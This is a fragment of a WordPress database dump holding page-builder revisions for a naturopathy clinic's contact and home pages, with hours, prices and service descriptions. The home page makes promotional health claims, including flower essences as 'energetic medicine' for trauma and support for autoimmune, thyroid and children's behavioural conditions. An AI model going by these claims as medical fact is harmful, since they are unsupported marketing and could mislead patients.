05:11:34','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"560px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available.</span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2022-10-21 13:11:34','2022-10-21 05:11:34','',26,'https://verdenaturopathy.com.au/?p=389',0,'revision','',0),(391,1,'2022-12-24 22:27:38','2022-12-24 14:27:38','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $150\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $50\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.<span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" title_text=\"5-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Flower essence consult (30 min) - $75\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A consult devoted to your emotional wellbeing. Flower essences are a form of energetic medicine used to assist with working through negative beliefs, stress or trauma. Flower essences are gentle and supportive in nature making them perfect for children too. Consult includes a 25ml customised essence. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" 